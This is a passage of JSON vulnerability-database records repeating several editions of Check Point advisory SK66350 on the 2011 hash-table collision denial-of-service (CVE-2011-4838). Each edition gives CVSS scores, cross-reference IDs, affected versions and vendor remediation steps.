"FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "CENTOS_RHSA-2012-0069.NASL", "ALA_ALAS-2012-37.NASL", "F5_BIGIP_SOL13588.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0092", "CESA-2012:0070"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:BFF2C21133", "FEDORA:6D8EE20EB6"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0019", "ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0070"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908", "DEBIAN:DLA-209-1:6EC99"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116", "RUBY:RUBY-2011-4815-78118"]}], "modified": "2021-11-20T07:10:41", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-20T07:10:41", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-21T11:11:12", "differentElements": ["modified", "published"], "edition": 37}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-21T15:16:20", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4885", "UB:CVE-2011-4838", "UB:CVE-2011-4815"]}, {"type": "cve", "idList": ["CVE-2011-4885", "CVE-2011-3414", "CVE-2011-4838", "CVE-2011-4815"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2013-033", "CPAI-2014-1022", "CPAI-2012-001"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:26126", "SSV:26122", "SSV:30001", "SSV:72454", "SSV:26121"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310122002", "OPENVAS:863921", "OPENVAS:1361412562310870638", "OPENVAS:136141256231070754", "OPENVAS:863681", "OPENVAS:863824", "OPENVAS:70735", "OPENVAS:1361412562310881149", "OPENVAS:863740", "OPENVAS:136141256231071568", "OPENVAS:1361412562310120218", "OPENVAS:70754", "OPENVAS:863735", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310120256", "OPENVAS:881167", "OPENVAS:831554", "OPENVAS:881075", "OPENVAS:870638", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310863921", "OPENVAS:863742", "OPENVAS:1361412562310122001", "OPENVAS:71568", "OPENVAS:1361412562310863742"]}, {"type": "nessus", "idList": ["PHP_5_HASH_COLLISION_DOS.NBIN", "FEDORA_2011-17551.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "DEBIAN_DLA-209.NASL", "ALA_ALAS-2012-35.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "REDHAT-RHSA-2012-0069.NASL", "FEDORA_2012-0504.NASL", "FEDORA_2011-17542.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "REDHAT-RHSA-2012-0070.NASL", "SOLARIS11_RUBY_20120417.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "FEDORA_2012-0420.NASL", "F5_BIGIP_SOL13588.NASL", "GENTOO_GLSA-201207-06.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "CENTOS_RHSA-2012-0069.NASL", "CENTOS_RHSA-2012-0070.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0069", "CESA-2012:0093"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:3515C213E6", "FEDORA:76D5120DE0", "FEDORA:6D8EE20EB6", "FEDORA:6D55C20D95", "FEDORA:BFF2C21133"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0069", "RHSA-2012:0092"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908", "DEBIAN:DLA-209-1:6EC99"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-21T15:16:20", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-21T15:16:20", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-21T15:16:20", "differentElements": ["modified", "published"], "edition": 38}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-22T15:09:48", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4885", "UB:CVE-2011-4838", "UB:CVE-2011-4815"]}, {"type": "cve", "idList": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-001", "CPAI-2014-1022", "CPAI-2013-033"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:26126", "SSV:26121", "SSV:30001", "SSV:26122", "SSV:72454"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310870638", "OPENVAS:70735", "OPENVAS:1361412562310863921", "OPENVAS:1361412562310122002", "OPENVAS:831554", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310122001", "OPENVAS:1361412562310863742", "OPENVAS:1361412562310120218", "OPENVAS:863742", "OPENVAS:1361412562310881149", "OPENVAS:863824", "OPENVAS:863681", "OPENVAS:136141256231071568", "OPENVAS:881167", "OPENVAS:863735", "OPENVAS:71568", "OPENVAS:136141256231070754", "OPENVAS:1361412562310120256", "OPENVAS:1361412562310881167", "OPENVAS:863921", "OPENVAS:1361412562310831554", "OPENVAS:870638", "OPENVAS:863740", "OPENVAS:70754", "OPENVAS:881075"]}, {"type": "nessus", "idList": ["ASP_NET_HASH_COLLISION_DOS.NBIN", "DEBIAN_DLA-209.NASL", "ALA_ALAS-2012-35.NASL", "FEDORA_2012-0504.NASL", "CENTOS_RHSA-2012-0069.NASL", "GENTOO_GLSA-201207-06.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "CENTOS_RHSA-2012-0070.NASL", "FEDORA_2012-0420.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "REDHAT-RHSA-2012-0070.NASL", "REDHAT-RHSA-2012-0069.NASL", "SOLARIS11_RUBY_20120417.NASL", "FEDORA_2011-17551.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "F5_BIGIP_SOL13588.NASL", "FEDORA_2011-17542.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0069", "CESA-2012:0093"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:76D5120DE0", "FEDORA:BFF2C21133", "FEDORA:6D55C20D95", "FEDORA:6D8EE20EB6", "FEDORA:3515C213E6"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0092", "RHSA-2012:0069"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116", "RUBY:RUBY-2011-4815-78118"]}], "modified": "2021-11-22T15:09:48", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-22T15:09:48", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-22T15:09:48", "differentElements": ["modified", "published"], "edition": 39}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-23T07:13:29", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "cve", "idList": ["CVE-2011-3414", "CVE-2011-4838", "CVE-2011-4885", "CVE-2011-4815"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4815", "UB:CVE-2011-4885", "UB:CVE-2011-4838"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022", "CPAI-2012-001", "CPAI-2013-033"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:72454", "SSV:26122", "SSV:26126", "SSV:30001", "SSV:26121"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310831554", "OPENVAS:863706", "OPENVAS:1361412562310863706", "OPENVAS:1361412562310863921", "OPENVAS:863713", "OPENVAS:881167", "OPENVAS:863735", "OPENVAS:1361412562310881167", "OPENVAS:863921", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310122002", "OPENVAS:70754", "OPENVAS:863681", "OPENVAS:864015", "OPENVAS:831554", "OPENVAS:870638", "OPENVAS:1361412562310870638", "OPENVAS:1361412562310122001", "OPENVAS:71568", "OPENVAS:136141256231071568", "OPENVAS:136141256231070754", "OPENVAS:1361412562310863712", "OPENVAS:1361412562310120218"]}, {"type": "nessus", "idList": ["SOLARIS11_RUBY_20120417.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "FEDORA_2012-0420.NASL", "CENTOS_RHSA-2012-0070.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "FEDORA_2011-17542.NASL", "REDHAT-RHSA-2012-0019.NASL", "GENTOO_GLSA-201207-06.NASL", "CENTOS_RHSA-2012-0069.NASL", "REDHAT-RHSA-2012-0070.NASL", "ALA_ALAS-2012-35.NASL", "FEDORA_2011-17551.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "FEDORA_2012-0504.NASL", "ALA_ALAS-2012-37.NASL", "REDHAT-RHSA-2012-0069.NASL", "F5_BIGIP_SOL13588.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "DEBIAN_DLA-209.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "SL_20120130_RUBY_ON_SL4_X.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0070", "CESA-2012:0019"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:BFF2C21133", "FEDORA:6D8EE20EB6", "FEDORA:A38F421375", "FEDORA:994FA20B8F", "FEDORA:7706F20CE7"]}, {"type": "amazon", "idList": ["ALAS-2012-035", "ALAS-2012-037"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069", "ELSA-2012-0019"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0070"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116", "RUBY:RUBY-2011-4815-78118"]}], "modified": "2021-11-23T07:13:29", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-23T07:13:29", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-23T07:13:29", "differentElements": ["modified", "published"], "edition": 40}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check 